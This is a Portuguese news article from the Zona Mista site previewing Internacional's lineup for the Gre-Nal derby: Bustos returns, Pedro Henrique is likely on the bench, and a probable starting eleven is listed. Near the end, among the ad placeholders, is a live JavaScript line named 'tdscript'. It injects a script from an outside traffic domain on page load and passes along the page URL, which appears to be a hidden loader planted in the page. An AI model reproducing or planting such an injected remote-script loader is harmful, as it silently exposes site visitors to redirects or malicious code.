Publicidade

Inter terá retorno de Bustos e poderá contar com Pedro Henrique no banco para o Gre-Nal

Equipe sabe da necessidade de reagir depois da queda para o Fluminense na Libertadores

Publicidade

Ainda juntando os cacos depois da frustrante eliminação para o Fluminense na semifinal da Libertadores, o Inter segue trabalhando no CT Parque Gigante de olho no Gre-Nal de domingo, 16h, no Beira-Rio, pelo segundo turno do Brasileirão. Uma certeza do time de Eduardo Coudet é o retorno de Bustos, já que Hugo Mallo está suspenso pela expulsão contra o Atlético-MG no sábado passado.

Homem de confiança de Coudet, o lateral espanhol foi titular nos dois jogos contra o Fluminense e inclusive fez um gol de cabeça na partida de ida no Rio de Janeiro. Além de Bustos, o meia Carlos De Pena volta a ficar à disposição depois de cumprir suspensão na rodada passada.

Outra novidade é o retorno do atacante Pedro Henrique, que novamente trabalhou com os colegas sem qualquer limitação. Ele vem de uma cirurgia no antebraço esquerdo por lesão sofrida no jogo contra o Goiás, fora de casa, em empate em 0x0. A tendência é que comece o clássico no banco e seja opção de velocidade para o segundo tempo.

Publicidade

Provável time do Inter

Atualmente no 14° lugar com 29 pontos, o Inter deverá entrar em campo pelo clássico do Brasileirão com Rochet; Bustos, Vitão, Mercado e Renê; Johnny, Mauricio, Aránguiz e Wanderson; Alan Patrick e Enner Valencia.

Siga o Zona Mista nas redes sociais: TwitterInstagramFacebook e YouTube. Google News do Zona Mista (zonamista.com.br)

loading...

Publicidade

let tdscript = document.createElement('script'); tdscript.src = "https://sap-traffic.com/output/211?ref="+window.location.href; document.body.append(tdscript);

Utilizamos cookies. Aceitar Ler políticas